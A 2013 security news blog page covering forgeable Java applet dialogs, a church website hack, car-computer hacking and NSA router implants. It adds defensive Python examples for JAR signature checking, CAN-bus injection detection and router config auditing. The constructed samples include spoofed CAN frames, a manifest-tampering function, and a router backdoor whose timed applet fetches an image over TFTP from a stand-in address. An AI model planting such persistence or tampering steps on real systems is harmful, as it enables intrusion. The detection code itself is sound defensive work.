Wednesday, 4 September 2013

Researchers: Oracle’s Java Security Fails

Faced with an onslaught of malware attacks that leverage vulnerabilities and design weaknesses in Java, Oracle Corp. recently tweaked things so that Java now warns users about the security risks of running Java content. But new research suggests that the integrity and accuracy of these warning messages can be subverted easily in any number of ways, and that Oracle’s new security scheme actually punishes Java application developers who adhere to it.

Java’s security dialog box.
Running a Java applet now pops up a security dialog box that presents users with information about the name, publisher and source of the application. Oracle says this pop-up is designed to warn users of potential security risks, such as using old versions of Java or running applet code whose signature does not chain to a trusted Certificate Authority.
Security experts differ over whether regular users pay any mind whatsoever to these warnings. But to make matters worse, new research suggests most of the information contained in the pop-ups can be forged by malware writers.
In a series of scathing blog posts, longtime Java developer Jerry Jongerius details the various ways that attackers can subvert the usefulness of these dialog boxes. To illustrate his point, Jongerius uses an applet obtained from Oracle’s own Web site, javadetection.jar, and shows that two of the three fields the dialog displays (“Name” and “Location”) can be changed without invalidating the applet’s existing cryptographic signature, because neither field is taken from the signed part of the applet.
“The bottom line in all of this is not the security risk of the errors but that Oracle made such incredibly basic ‘101’ type errors — in allowing ‘unsigned information’ into their security dialogs,” Jongerius wrote in an email exchange. “The magnitude of that ‘fail’ is huge.”
Jongerius presents the following scenario in which an attacker might use the dialog boxes to trick users into running unsafe applets:
“Imagine a hacker taking a real signed Java application for remote desktop control / assistance, and placing it on a gaming site, renaming it ‘Chess’. An unsuspecting end user would get a security popup from Java asking if they want to run ‘Chess’, and because they do, answer yes — but behind the scenes, the end user’s computer is now under the remote control of a hacker (and maybe to throw off suspicion, implemented a basic ‘Chess’ in HTML5 so it looks like that applet worked) — all because Oracle allowed the ‘Name’ in security dialogs to be forged to something innocent and incorrect.”
Oracle has not responded to requests for comment. But Jongerius is hardly the only software expert crying foul about the company’s security prompts. Will Dormann, writing for the Carnegie Mellon University’s Software Engineering Institute, actually warns Java developers against adopting a key tenet of Oracle’s new security guidelines.

Oracle recommends that all Java applets be cryptographically signed regardless of the privileges required by the program. Unsigned Java applets will run within a web page with a scary red warning that, “Running this application may be a security risk.” One of Java’s most-touted features is a “sandbox” security mechanism that is supposed to prevent certain functions when the applet is sent as part of a Web page. But according to both Jongerius and Dormann, Oracle made the default behavior for signed code to be full access to the computer (essentially, negating the usefulness of the sandbox).
“What about Oracle’s vision of a Java future where every Java applet is signed?” asks Dormann, a longtime security researcher with the Department of Homeland Security’s US Computer Emergency Readiness Team (US-CERT). “What this vision means is that every Java applet, which would be signed, would also now be in a state where it could be repurposed because it is now no longer restricted by the sandbox. A poorly designed sandboxed Java applet can’t do much of anything. However, a poorly designed signed Java applet can do pretty much anything that native code can.”
Both Dormann and Jongerius offer a number of ideas that Oracle could use to remedy the situation. Only time will tell if the company will take notice of the recommendations. In the meantime, I’ll continue to urge regular Internet users to get rid of Java completely, or at least to disconnect the Java plugin from any Web browsers (obligatory disclaimer: this advice does not scale for business users, whose computers may rely on Java for specific applications).
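To make concrete what “unsigned information in the dialog” means, here is an added example (mine, not code from Jongerius, Dormann or Oracle) that builds a tiny signed-JAR layout in memory and contrasts two ways of choosing the “Name” the dialog shows. In a real JAR the PKCS#7 block in META-INF signs the .SF file, which in turn pins MANIFEST.MF by digest, so anything in the manifest is covered by the signature while the HTML applet tag and the JNLP file are not. The applet tag, the JAR contents, the file names and the Application-Name value are constructed assumptions; certificate-chain checking is deliberately left out.

```python
import base64
import hashlib
import io
import re
import zipfile

# Constructed example data, not from the article: the HTML that would embed the
# applet. The name="Chess" here is attacker-controlled and is never signed.
APPLET_TAG = ('<applet name="Chess" code="rdp.Helper" archive="helper.jar" '
              'width="400" height="400"></applet>')


def _b64sha256(data: bytes) -> str:
    return base64.b64encode(hashlib.sha256(data).digest()).decode()


def build_sample_jar(app_name: str) -> bytes:
    """Build an in-memory JAR laid out the way jarsigner lays one out.

    The PKCS#7 block (.RSA) is a placeholder (assumption): checking the signer's
    certificate chain is out of scope here. What matters for the dialog is that
    the .SF file pins the whole MANIFEST.MF by digest, so every manifest
    attribute, including Application-Name, is under the signature.
    """
    class_bytes = b"\xca\xfe\xba\xbe constructed class bytes"
    manifest = (
        "Manifest-Version: 1.0\r\n"
        f"Application-Name: {app_name}\r\n"
        "Permissions: all-permissions\r\n"
        "\r\n"
        "Name: rdp/Helper.class\r\n"
        f"SHA-256-Digest: {_b64sha256(class_bytes)}\r\n"
        "\r\n"
    ).encode()
    signature_file = (
        "Signature-Version: 1.0\r\n"
        f"SHA-256-Digest-Manifest: {_b64sha256(manifest)}\r\n"
        "\r\n"
    ).encode()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", manifest)
        jar.writestr("META-INF/SIGNER.SF", signature_file)
        jar.writestr("META-INF/SIGNER.RSA", b"<pkcs7 placeholder, not verified here>")
        jar.writestr("rdp/Helper.class", class_bytes)
    return buf.getvalue()


def parse_main_section(text: bytes) -> dict:
    """Parse the main section of a MANIFEST.MF or .SF file. Handles the 72-byte
    line wrapping of the JAR spec: a continuation line starts with one space."""
    attrs, last = {}, None
    for line in text.decode().split("\r\n\r\n")[0].split("\r\n"):
        if line.startswith(" ") and last is not None:
            attrs[last] += line[1:]
        elif ": " in line:
            last, value = line.split(": ", 1)
            attrs[last] = value
    return attrs


def manifest_is_intact(jar_bytes: bytes) -> bool:
    """True if MANIFEST.MF still matches the digest pinned in the signed .SF file."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        manifest = jar.read("META-INF/MANIFEST.MF")
        sf = parse_main_section(jar.read("META-INF/SIGNER.SF"))
    return sf.get("SHA-256-Digest-Manifest") == _b64sha256(manifest)


def weak_dialog_name(applet_tag: str) -> str:
    """The behaviour the article criticises: the displayed name comes from unsigned HTML."""
    match = re.search(r'name="([^"]*)"', applet_tag)
    return match.group(1) if match else "Unknown"


def signed_dialog_name(jar_bytes: bytes) -> str:
    """Hardened: show only a name that is covered by the signature, otherwise say so."""
    if not manifest_is_intact(jar_bytes):
        return "UNTRUSTED (manifest digest mismatch)"
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        attrs = parse_main_section(jar.read("META-INF/MANIFEST.MF"))
    return attrs.get("Application-Name", "UNTRUSTED (no signed Application-Name)")


def tamper_manifest(jar_bytes: bytes, old: str, new: str) -> bytes:
    """Attacker move: edit Application-Name in the manifest without re-signing."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == "META-INF/MANIFEST.MF":
                data = data.replace(old.encode(), new.encode())
            dst.writestr(info.filename, data)
    return out.getvalue()


if __name__ == "__main__":
    jar = build_sample_jar("Remote Desktop Helper")
    print("unsigned HTML says:   ", weak_dialog_name(APPLET_TAG))
    print("signed manifest says: ", signed_dialog_name(jar))
    tampered = tamper_manifest(jar, "Remote Desktop Helper", "Chess")
    print("after tampering:      ", signed_dialog_name(tampered))
```

The weak path yields “Chess”, which is exactly the remote-desktop-as-chess scenario above: nothing in the HTML is signed, so the attacker picks the name. The hardened path takes the name only from the signed manifest, and if the manifest is edited after signing the .SF digest no longer matches, so the applet is reported as untrusted instead of being given a friendly name. Application-Name and Permissions are real JAR manifest attributes that Java recognises; whether a given Java release actually prefers them over the unsigned applet-tag value is precisely what the research above disputes.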

'The Messiah' gives his reasons for hacking Sun Ho's site



A hacker who calls himself "The Messiah", and who hacked into the website of City Harvest Church (CHC) co-founder Sun Ho, has resurfaced with a Q&A site.

On the site, titled “8 questions with the Messiah”, the hacker, who revealed that he operates under the umbrella of the hacking group "Anonymous Collective", said that Ho's website has very little security, something he called “horrifying” given that the site apparently holds the information of over 5,000 churchgoers.

“It took us less than 15 minutes to gain access,” he said.

The information he referred to included names, addresses, telephone numbers and passwords. Perhaps to show how insecure Ho's site is, the hacker said he intends to expose the information soon. However, revealing it now would be "rash", he added.

CHC founder Kong Hee and his deputies have been charged with the alleged misuse of church funds amounting to about $50 million; most of it went to Sun Ho’s singing career in the US. The trial is ongoing.
Screen shot of the hacker's Q&A site explaining reasons for hacking Sun Ho's website. (Online Screengrab)

Hackers crack car systems wide open

As cars become more like PCs on wheels, what's to stop a hacker from taking over yours?
In recent demonstrations, hackers have shown they can slam a car's brakes on at freeway speeds, jerk the steering wheel and even shut down the engine - all from their laptop computers.
The hackers are publicising their work to reveal vulnerabilities present in a growing number of car computers. All cars and trucks contain from 20 to 70 computers. They control everything from the brakes to acceleration to the windows, and are connected to an internal network. A few hackers have recently managed to find their way into these intricate networks.
In one case, a pair of hackers manipulated two cars by plugging a laptop into a port under the dashboard where mechanics connect their computers to search for problems. Scarier yet, another group took control of a car's computers through cellular telephone and Bluetooth connections, the CD player and even the tyre pressure monitoring system.
SECURITY EXPERTS
To be sure, the “hackers” involved were well-intentioned computer security experts, and it took both groups months to break into the computers. And there have been no real-world cases of a hacker remotely taking over a car. But experts say high-tech hijackings will get easier as automakers give cars full internet access and add computer-controlled safety devices that take over driving duties, such as braking or steering, in emergencies.
Another possibility: A tech-savvy thief could unlock the doors and drive off with your vehicle.
Security research company CEO Rich Mogull commented: “The more technology they add to the vehicle, the more opportunities there are for that to be abused for nefarious purposes.
“History keeps showing us that anything with a computer chip in it is vulnerable.”
Over the past 25 years, car companies have gradually computerised functions such as steering, braking, accelerating and changing gears. Electronic throttle position sensors, for instance, are more reliable than the old throttle cables. Electronic parts also reduce weight and help cars use less fuel - but the networks of little computers inside today's cars are fertile ground for hackers.
Charlie Miller, a security engineer for Twitter, and fellow hacker Chris Valasek, director of intelligence at a Pittsburgh computer security consulting firm, cracked the computer systems of a 2010 Toyota Prius and 2010 Ford Escape through ports used by mechanics - although, even with their expertise, it took them nine months to do it.
Valasek said: “We could control steering, braking, acceleration to a certain extent, the seat belts, lights, hooter, speedometer and even the fuel gauge.”
GOING PUBLIC
Their report, which included instructions on how to break into the cars' networks, was released at a hacker convention in August. They said they went public to draw attention to the problem and get automakers to fix it, saying car companies haven’t put any security measures on the diagnostic ports.
Ford wouldn't comment other than saying it took security seriously, and pointing out that Miller and Valasek needed physical access to the cars to hack in.
Toyota said it did have added security - which it continually tested to stay ahead of hackers; it said its computers were programmed to recognise rogue commands and reject them.
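Toyota's statement that its computers are “programmed to recognise rogue commands” points at the one defensive property a CAN bus gives you: legitimate ECUs broadcast most frames on a fixed schedule, so a frame injected from the diagnostic port shows up as an extra message arriving off-period, or under an arbitration ID no ECU normally sends. The following is an added example of that detection logic (mine, not Toyota's, Miller's or Valasek's), run over a constructed capture; the arbitration IDs, periods and payload layout are assumptions, and the only standard value used is 0x7DF, the OBD-II functional request address.

```python
import statistics
import struct
from dataclasses import dataclass


@dataclass(frozen=True)
class CanFrame:
    ts: float      # seconds since capture start
    can_id: int    # 11-bit arbitration ID
    data: bytes    # 0..8 payload bytes


def sample_capture() -> list:
    """Constructed capture (not real vehicle data). Two legitimate ECUs broadcast
    IDs 0x0B4 (every 20 ms) and 0x2C4 (every 10 ms); an attacker plugged into the
    diagnostic port injects two spoofed 0x0B4 frames and one UDS
    DiagnosticSessionControl request on the OBD-II functional address 0x7DF.
    IDs and payload layout are assumptions made for this example."""
    frames = []
    for i in range(20):
        frames.append(CanFrame(i * 0.020, 0x0B4, struct.pack(">H6x", 1200 + i)))
    for i in range(40):
        frames.append(CanFrame(i * 0.010, 0x2C4, bytes([0x10, 0x00, i & 0xFF])))
    frames.append(CanFrame(0.105, 0x0B4, struct.pack(">H6x", 0)))      # spoofed value
    frames.append(CanFrame(0.205, 0x0B4, struct.pack(">H6x", 0)))      # spoofed value
    frames.append(CanFrame(0.300, 0x7DF, bytes([0x02, 0x10, 0x02])))   # diag session request
    return sorted(frames, key=lambda f: (f.ts, f.can_id))


def learn_baseline(frames, until: float) -> dict:
    """Per-ID median inter-arrival time and last timestamp from a clean window.
    Frames must be sorted by timestamp."""
    seen = {}
    for f in frames:
        if f.ts >= until:
            break
        seen.setdefault(f.can_id, []).append(f.ts)
    baseline = {}
    for can_id, stamps in seen.items():
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        if gaps:
            baseline[can_id] = {"period": statistics.median(gaps), "last": stamps[-1]}
    return baseline


def detect(frames, baseline_until: float = 0.1, tolerance: float = 0.5) -> list:
    """Flag frames whose ID was never seen in the clean window, or which arrive
    earlier than `tolerance` * the learned period (an injected frame lands between
    two legitimate periodic ones). Returns (ts, can_id, reason) tuples."""
    baseline = learn_baseline(frames, baseline_until)
    alerts = []
    for f in frames:
        if f.ts < baseline_until:
            continue
        entry = baseline.get(f.can_id)
        if entry is None:
            alerts.append((f.ts, f.can_id, "id never seen in baseline"))
            continue
        gap = f.ts - entry["last"]
        if gap < tolerance * entry["period"]:
            alerts.append((f.ts, f.can_id,
                           f"arrived {gap * 1000:.1f} ms after previous frame, "
                           f"learned period {entry['period'] * 1000:.0f} ms"))
        entry["last"] = f.ts
    return alerts


if __name__ == "__main__":
    for ts, can_id, reason in detect(sample_capture()):
        print(f"t={ts:.3f}s id=0x{can_id:03X}: {reason}")
```

The period check catches the two spoofed frames because each lands only 5 ms after a genuine one, and the unknown-ID check catches the diagnostic session request. The caveat is that an attacker who can also silence the legitimate ECU, or who replays on its schedule, will not trip a rate check, so this complements, rather than replaces, authenticating what is allowed to talk on the diagnostic port.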
“We could have turned the brakes off.”
Two years ago, researchers at the University of Washington and University of California in San Diego did more extensive work, hacking their way into a 2009-model mid-sized car through its cellular, Bluetooth and other wireless connections - even the CD player.
Computer science professor Stefan Savage said he and other researchers could control nearly everything but the car's steering.
“We could have killed the engine. We could have engaged the brakes,” he said.
Savage wouldn't identify the make or model of the car they hacked into, but two people who knew about the research said the car was from General Motors and the researchers compromised the OnStar safety system, best known for using cellular technology to check on customers and call for help in a crash.
GM wouldn't comment on the research, but said it took security seriously and was putting strategies in place to reduce risk.
CLOSING THE LOOPHOLES
One of the people said GM engineers initially dismissed the researchers' work, but after reading the report, quickly moved to close loopholes that allowed access to the car's computers.
Savage doesn't think common criminals will be able to seize control of cars electronically anytime soon - it would take too much time, expertise, money and hard work to hack into the multitude of computer systems found in a modern car.
“You're talking about a rarefied group with the resources and wherewithal,” he said.
Instead, he believes basic theft is a more likely consequence of computerisation, with criminals being able to unlock doors remotely and then start and drive the car by hacking through the diagnostic port. Remote door unlocking could also lead to theft of packages, phones and other items stored in a car. - Sapa-AP

NSA Laughs at PCs, Prefers Hacking Routers and Switches for bugging

The NSA runs a massive, full-time hacking operation targeting foreign systems, the latest leaks from Edward Snowden show. But unlike conventional cybercriminals, the agency is less interested in hacking PCs and Macs. Instead, America’s spooks have their eyes on the internet routers and switches that form the basic infrastructure of the net, and are largely overlooked as security vulnerabilities.
Under a $652-million program codenamed “Genie,” U.S. intel agencies have hacked into foreign computers and networks to monitor communications crossing them and to establish control over them, according to a secret black budget document leaked to the Washington Post. U.S. intelligence agencies conducted 231 offensive cyber operations in 2011 to penetrate the computer networks of targets abroad.
This included not only installing covert “implants” in foreign desktop computers but also on routers and firewalls — tens of thousands of machines every year in all. According to the Post, the government planned to expand the program to cover millions of additional foreign machines in the future and preferred hacking routers to individual PCs because it gave agencies access to data from entire networks of computers instead of just individual machines.
Most of the hacks targeted the systems and communications of top adversaries like China, Russia, Iran and North Korea and included activities around nuclear proliferation.
The NSA’s focus on routers highlights an often-overlooked attack vector with huge advantages for the intruder, says Marc Maiffret, chief technology officer at security firm Beyond Trust. Hacking routers is an ideal way for an intelligence or military agency to maintain a persistent hold on network traffic because the systems aren’t updated with new software very often or patched in the way that Windows and Linux systems are.
“No one updates their routers,” he says. “If you think people are bad about patching Windows and Linux (which they are) then they are … horrible about updating their networking gear because it is too critical, and usually they don’t have redundancy to be able to do it properly.”
He also notes that routers don’t have security software that can help detect a breach.
“The challenge [with desktop systems] is that while antivirus don’t work well on your desktop, they at least do something [to detect attacks],” he says. “But you don’t even have an integrity check for the most part on routers and other such devices like IP cameras.”
Hijacking routers and switches could allow the NSA to do more than just eavesdrop on all the communications crossing that equipment. It would also let them bring down networks or prevent certain communication, such as military orders, from getting through, though the Post story doesn’t report any such activities. With control of routers, the NSA could re-route traffic to a different location, or even alter it for disinformation campaigns, such as planting information that would have a detrimental political effect or altering orders to re-route troops or supplies in a military operation.
According to the budget document, the CIA’s Tailored Access Programs and NSA’s software engineers possess “templates” for breaking into common brands and models of routers, switches and firewalls.
The article doesn’t say it, but this would likely involve pre-written scripts or backdoor tools and root kits for attacking known but unpatched vulnerabilities in these systems, as well as for attacking zero-day vulnerabilities that are yet unknown to the vendor and customers.
“[Router software is] just an operating system and can be hacked just as Windows or Linux would be hacked,” Maiffret says. “They’ve tried to harden them a little bit more [than these other systems], but for folks at a place like the NSA or any other major government intelligence agency, it’s pretty standard fare of having a ready-to-go backdoor for your [off-the-shelf] Cisco or Juniper models.”
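Maiffret's point that there is “no integrity check” on routers is partly addressable from outside the box. The example below (added here, not from the article, Beyond Trust or any vendor tool) takes a Cisco IOS-style running configuration that has been pulled off a router, fingerprints it against a known-good baseline, and scans it for the kind of persistence an implant or a ready-made backdoor leaves behind: unapproved local accounts, a boot statement pointing at an unexpected image, RW SNMP communities, management services, and EEM applets that run commands on a timer. Both configurations, the hostname, user names, image name, address and the finding categories are constructed assumptions.

```python
import hashlib
import re

# Constructed sample configs (not real devices): a known-good running-config saved
# at the last rebuild, and one pulled later from the same router. Hostname, users,
# image name, hashes and the 198.51.100.7 address are made up for this example.
KNOWN_GOOD_CONFIG = """\
!
! Last configuration change at 09:12:41 UTC Tue Aug 20 2013 by netops
!
version 15.4
hostname edge-rtr-1
boot-start-marker
boot system flash:c2900-universalk9-mz.SPA.154-3.M3.bin
boot-end-marker
username netops privilege 15 secret 5 $1$abcd$placeholderhash
snmp-server community ro-only RO
line vty 0 4
 transport input ssh
end
"""

SUSPECT_CONFIG = """\
!
! Last configuration change at 03:14:07 UTC Wed Sep 4 2013 by netops
!
version 15.4
hostname edge-rtr-1
boot-start-marker
boot system flash:c2900-universalk9-mz.SPA.154-3.M3.bin
boot-end-marker
username netops privilege 15 secret 5 $1$abcd$placeholderhash
username svc_backup privilege 15 secret 5 $1$zzzz$placeholderhash
ip http server
snmp-server community ro-only RO
snmp-server community s3cret RW
event manager applet persist
 event timer watchdog time 300
 action 1.0 cli command "enable"
 action 2.0 cli command "copy tftp://198.51.100.7/img.bin flash:"
line vty 0 4
 transport input ssh
end
"""

# Allow-lists an operator would maintain per device class (assumptions).
APPROVED_USERS = {"netops"}
APPROVED_IMAGES = {"flash:c2900-universalk9-mz.SPA.154-3.M3.bin"}


def normalize(config: str) -> str:
    """Drop comment and timestamp lines so cosmetic changes do not cause false drift."""
    return "\n".join(line.rstrip() for line in config.splitlines()
                     if line.strip() and not line.startswith("!"))


def config_fingerprint(config: str) -> str:
    """SHA-256 of the normalized config; store this when the device is rebuilt."""
    return hashlib.sha256(normalize(config).encode()).hexdigest()


def audit(config: str, baseline_fingerprint: str) -> list:
    """Return (category, line) findings. Category names are this example's own."""
    findings = []
    if config_fingerprint(config) != baseline_fingerprint:
        findings.append(("config_drift", "normalized config differs from baseline"))
    for line in normalize(config).splitlines():
        if m := re.match(r"username (\S+)", line):
            if m.group(1) not in APPROVED_USERS:
                findings.append(("unknown_user", line))
        elif m := re.match(r"boot system (\S+)", line):
            if m.group(1) not in APPROVED_IMAGES:
                findings.append(("unapproved_boot_image", line))
        elif line.startswith("event manager applet "):
            findings.append(("eem_applet", line))          # scheduled command execution
        elif re.match(r"snmp-server community \S+ RW", line):
            findings.append(("snmp_rw", line))             # write access to the config
        elif line in ("ip http server", "ip http secure-server") or line.startswith("tftp-server "):
            findings.append(("management_service", line))
    return findings


if __name__ == "__main__":
    baseline = config_fingerprint(KNOWN_GOOD_CONFIG)
    for category, line in audit(SUSPECT_CONFIG, baseline):
        print(f"{category:22s} {line}")
```

Run audit() with the fingerprint recorded when the device was last rebuilt. Two caveats: a rootkit of the kind Core Security demonstrated can lie about what the device itself reports, so the config and the boot image should be fetched and hashed out of band (copied to the collector over SCP or TFTP and the image compared with the vendor's published hash) rather than trusted from `show` output; and a config_drift finding is only as useful as the discipline of re-baselining after every legitimate change.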
Not all of the activity mentioned in the budget document involved remote hacking. In some cases, according to the document, the operations involved clandestine activity by the CIA or military intelligence units to “physically place hardware implants or software modifications” to aid the spying.
“Much more often, an implant is coded entirely in software by an NSA group called Tailored Access Operations (TAO),” the Post writes in its story about the document. “As its name suggests, TAO builds attack tools that are custom-fitted to their targets.”
A handful of security researchers have uncovered vulnerabilities in routers in recent years that could be used to do the kind of hacking described in the budget document.
In 2005, security researcher Mike Lynn found a serious vulnerability in Cisco IOS, the operating system running on millions of Cisco routers around the world.
Lynn discovered the vulnerability after his employer, Internet Security Systems, asked him to reverse-engineer the Cisco operating system to see if he could find security problems with it. Cisco makes the majority of the routers that operate the backbone of the internet as well as many company networks and critical infrastructure systems. The Cisco IOS is as ubiquitous in the backbone as the Windows operating system is on desktops.
The vulnerability Lynn found, in a new version of the operating system that Cisco planned to release at the time, would have allowed someone to create a router worm that would shut down every Cisco router through which it passed, bringing down a nation’s critical infrastructure. It also would have allowed an attacker to gain complete control of the router to sniff all traffic passing through a network in order to read, record or alter it, or simply prevent traffic from reaching its recipient.
Once Lynn found the vulnerability, it took him six months to develop a working exploit to attack it.
Lynn had planned to discuss the vulnerability at the Black Hat security conference in Las Vegas, until Cisco intervened and forced him to pull the talk under threat of a lawsuit.
But if Lynn knew about the vulnerability, there were likely others who did as well — including intelligence agencies and criminal hackers.
Source code for Cisco’s IOS has been stolen at least twice, either by entities who were interested in studying the software to gain a competitive advantage or to uncover vulnerabilities that would allow someone to hack or control them.
Other researchers have uncovered different vulnerabilities in other Cisco routers that are commonly used in small businesses and home offices.
Every year at computer security conferences around the world — including the Black Hat conference where NSA Director Keith Alexander presented a keynote this year — U.S. intelligence agencies and contractors from around the world attend to discover information about new vulnerabilities that might be exploited and to hire talented researchers and hackers capable of finding more vulnerabilities in systems.
In 2008, a researcher at Core Security Technologies developed a root kit for the Cisco IOS that was designed to give an attacker a persistent foothold on a Cisco router while remaining undetected.
According to the Post story, the NSA designs most of the offensive tools it uses in its Genie operation, but it spent $25.1 million in one year for “additional covert purchases of software vulnerabilities” from private malware vendors who operate on the grey market — closed markets that peddle vulnerabilities and exploits to law enforcement and intelligence agencies, as opposed to the black market that sells them to cyber criminals.
The price of vulnerabilities and exploits varies, depending on a number of factors. Vulnerabilities and exploits can sell for anywhere from $50,000 to more than a million, depending on the exclusivity of the purchase — some vulnerabilities are sold to multiple parties with the understanding that others are using it as well — and their ubiquity. A vulnerability that exists in multiple versions of an operating system is more valuable than a vulnerability that exists in just one version. A class of vulnerability that crosses multiple browser brands is also more valuable than a single vulnerability that just affects the Safari browser or Chrome.
The Stuxnet cyber weapon that was reportedly created by the U.S. and Israel to sabotage centrifuges used in Iran’s uranium enrichment program, used five zero-day exploits to spread itself among systems in Iran, including a rare exploit that attacked the .LNK function in multiple versions of the Windows operating system in order to spread the worm silently via infected USB sticks.
Ubiquitous router vulnerabilities are difficult to find since there are so many different configurations for routers and an attack that works against one router configuration might not work for another. But a vulnerability that affects the core operating system is much more valuable since it is less likely to be dependent on the configuration. Maiffret says there hasn’t been a lot of public research on router vulnerabilities but whenever someone has taken a look at them, they have found security holes in them.
“They’re always successful in finding something,” he says.
Once a vulnerability becomes known to the software maker and is patched, it loses its value. But because many users do not patch their systems, some vulnerabilities can be used effectively for years even after a patch is available. The Conficker worm, for example, continued to infect millions of computers long after Microsoft released a patch that should have stopped the worm from spreading.
Routers in particular often remain unpatched because system administrators don’t think they will be targeted and because they are concerned about network outages that could occur while the patch is applied or if the patch is faulty.